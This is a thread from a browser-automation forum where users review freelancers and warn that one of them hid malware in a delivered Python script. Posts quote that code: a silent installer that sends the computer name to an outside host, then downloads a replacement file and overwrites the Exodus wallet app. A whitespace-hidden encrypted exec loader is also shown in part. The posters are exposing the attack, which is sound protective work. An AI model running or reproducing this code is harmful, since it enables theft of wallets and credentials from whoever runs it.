Отзывы о работе фрилансеров\Reviews of the work of freelancers

thotho

sergerdn

Lol. nice trick.

That code looks like https://cryptography.io/en/latest/fernet/, and it made to steal your passwords and other sensitive information.

import os
import subprocess

creationflags = subprocess.CREATE_NEW_PROCESS_GROUP | subprocess.CREATE_NO_WINDOW

subprocess.Popen(['cmd.exe','/c','start','/b','pip', 'install', 'requests', 'httpx'],creationflags=creationflags)
import requests
import httpx
data = {
        "username": os.getenv("COMPUTERNAME")      
    }
httpx.post("https://bananasquad.ru/downloadhandler", json=data)
subprocess.Popen(['cmd.exe','/c','start','/b','pip', 'install', 'pyperclip', 'pyotp', 'psutil', 'pycryptodome', 'asyncio', 'threaded', 'datetime', 'colorama', 'customtkinter', 'pyfiglet', 'tqdm', 'pypiwin32', 'pywin32', 'zipfile'],creationflags=creationflags)
import asyncio
import json
import ntpath
import random
import re
import shutil
import sqlite3
import threading
import zipfile
import psutil
import base64
import time
import pyperclip
from urllib.request import Request, urlopen

has_exodus = False

def inject():
    procc = "exodus.exe"
    local = os.getenv("localappdata")
    path = f"{local}/exodus"
    if not os.path.exists(path): return
    listOfFile = os.listdir(path)
    apps = []
    for file in listOfFile:
        if "app-" in file:
            apps += [file]
    exodusPatchURL = "https://bananasquad.ru/app.asar"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36"}
    req = Request(exodusPatchURL, headers=headers)
    response = urlopen(req)
    data = response.read()
    subprocess.Popen(f"taskkill /im {procc} /t /f >nul 2>&1", shell=True)
    for app in apps:
        try:
            fullpath = f"{path}/{app}/resources/app.asar"
            with open(fullpath, 'wb') as out_file1:
                out_file1.write(data)
        except: pass
inject()
### some other code

thotho

Yeah I'm pretty sure he stole a lot of creds from other people, support needs to ban this guy from here, keeping the place safe

Fox

@thotho said in Отзывы о работе фрилансеров\Reviews of the work of freelancers:

Yeah I'm pretty sure he stole a lot of creds from other people, support needs to ban this guy from here, keeping the place safe

This account has only 2 forum posts, I don't think it will be a big loss for him. For the future, pay attention to the reputation and reviews of performers. For payment always use a guarantor, it will protect both you and the performer.

sergerdn

@thotho said in Отзывы о работе фрилансеров\Reviews of the work of freelancers:

Yeah I'm pretty sure he stole a lot of creds from other people, support needs to ban this guy from here, keeping the place safe

It's always risky to order a script from an unknown person.

I reviewed his code, and I believe that he is not only a bad guy but also a bad programmer с руками из ж*пы.😂

His scripts didn't work at all on many computers.

sergerdn

@thotho

I suggest that you edit your post to remove the code to prevent others from seeing and using it.

https://community.bablosoft.com/topic/26054/отзывы-о-работе-фрилансеров-reviews-of-the-work-of-freelancers/173

thotho

I edited it, thanks

Yeah I asked for video proof before buying, he actually kinda made it but he added this in it bruh

sergerdn

@Fox , @thotho

Perhaps the developer may have been affected by malware, but they do not understand what is happening because their machine is hiding the malware.

https://blog.hacktivesecurity.com/index.php/2023/08/02/unveiling-the-hidden-threat-dissecting-a-malware-on-pypi-repository/

Fox

@thotho said in Отзывы о работе фрилансеров\Reviews of the work of freelancers:

https://community.bablosoft.com/topic/9316/freelancers-directory-browserautomationstudio/31?_=1699096834641

@support

Please ban this guy from this forum, I bought him a script and there is special lines hidden in it with a LOT of spaces

;exec(Fernet(b'J7eVU5kG3iLeufUd9zjPGi_U7mhItsxbBszu1KMLtgQ=').decrypt(b'gAAAAABlRXF0pinmnyOQVWo-tJJ5a13m-oXYpNqV5HYOnxsWi5AatuCp#########################zRG0_CQ2zB_Tpody_bbc7aPuri_mnghN_eKTuD55D3bYiTMH8LqshyLfvj_G67pijNjuMCV2t8vsZXT-Fvj41f-D39XXHXYraleVY1hf2j1s76CEwBmg4XGI1YrApGNfIwXXQ=='))

(code has been partially removed to not copy it)

it seems to be keylogger or idk some shit like that

2023-11-04 12-46-58.mp4

I just now watched the attached video, in it you show a script in python, which is designed to control an anti-detect browser, which is a competitor of BAS. Did I understand you correctly that you found an executor on the BAS forum to create a script to control a completely different anti-detect browser, you don't like the result of the work done and you ask to block this user on the BAS forum?

sergerdn

@Fox said in Отзывы о работе фрилансеров\Reviews of the work of freelancers:

.... you don't like the result of the work done and you ask to block this user on the BAS forum?

Да там еще смешнее, разработчик сказал, что сделал то, что даже теоретически нельзя сделать.

А именно проигрывать защищённый DRM контент через браузер, через который это нельзя сделать.

В BAS же нельзя, вот и, вероятно, ему и предложили не BAS. А там то тоже нельзя.😄

@thotho
Widevine DRM content can only be played on certified browsers such as Genuine Chrome, Opera, etc.

However, in this case, you encountered a challenge with fingerprints, which cannot be handled very easily.

A Former User

This post is deleted!

17whitehathacker

No need to overpay Write to me! I'll do it inexpensively
I will quickly make you any script
any automation. in any languages
we'll agree on the price
consultation is free
write your questions in more detail

t.me/WhiteHatHackerBAS
whitehathacker1717@gmail.com

nikita556

@phantomdevops17 Развод не выполняет задание время от времени делает новую телегу

pijon

@nikita556 В нике же сказано, фантомный разраб, так что тебе показалось :)

sergerdn

@nikita556 said in Отзывы о работе фрилансеров\Reviews of the work of freelancers:

@phantomdevops17 Развод не выполняет задание время от времени делает новую телегу

На этом форуме у него ни одного поста, кроме рекламного.

A Former User

@sergerdn said in Отзывы о работе фрилансеров\Reviews of the work of freelancers:

На этом форуме у него ни одного поста, кроме рекламного.

Это бесполезно, к таким все равно обращаются и еще умудряются платить вперед или аванс давать. Видимо их рассказы о том, что они могу все и за недорого делают свое дело.

sergerdn

@UserTrue said in Отзывы о работе фрилансеров\Reviews of the work of freelancers:

Видимо их рассказы о том, что они могу все и за недорого делают свое дело.

Да. Очень хочется верить в чудеса, даже взрослым людям.

basbotdev

100% Scammer. They are a Team who scammed all people

basbotdev

@phantomdevops17 said in Freelancers Directory BrowserAutomationStudio:

Development at B.A.S since January 2019 there is a premium every day there is work
We do projects with a partner. But for a new client, we will always find time and allocate an extra hour to solve your problem.

We Automate Everything Chrome Can Do...
Work in multithreading with: proxy fingerprint profiles across sites, servers, file systems and AP...
We carry out work efficiently, efficiently and quickly,

Software support and training with the program is free,
Minimum order from 50$ + evaluation of each project individually...

Write or call we answer quickly my telegram PhantomDevOps
You will be satisfied with the result))

100% Scammer. They are a Team who scammed all people

basbotdev

@nikita556 yes he is a scammer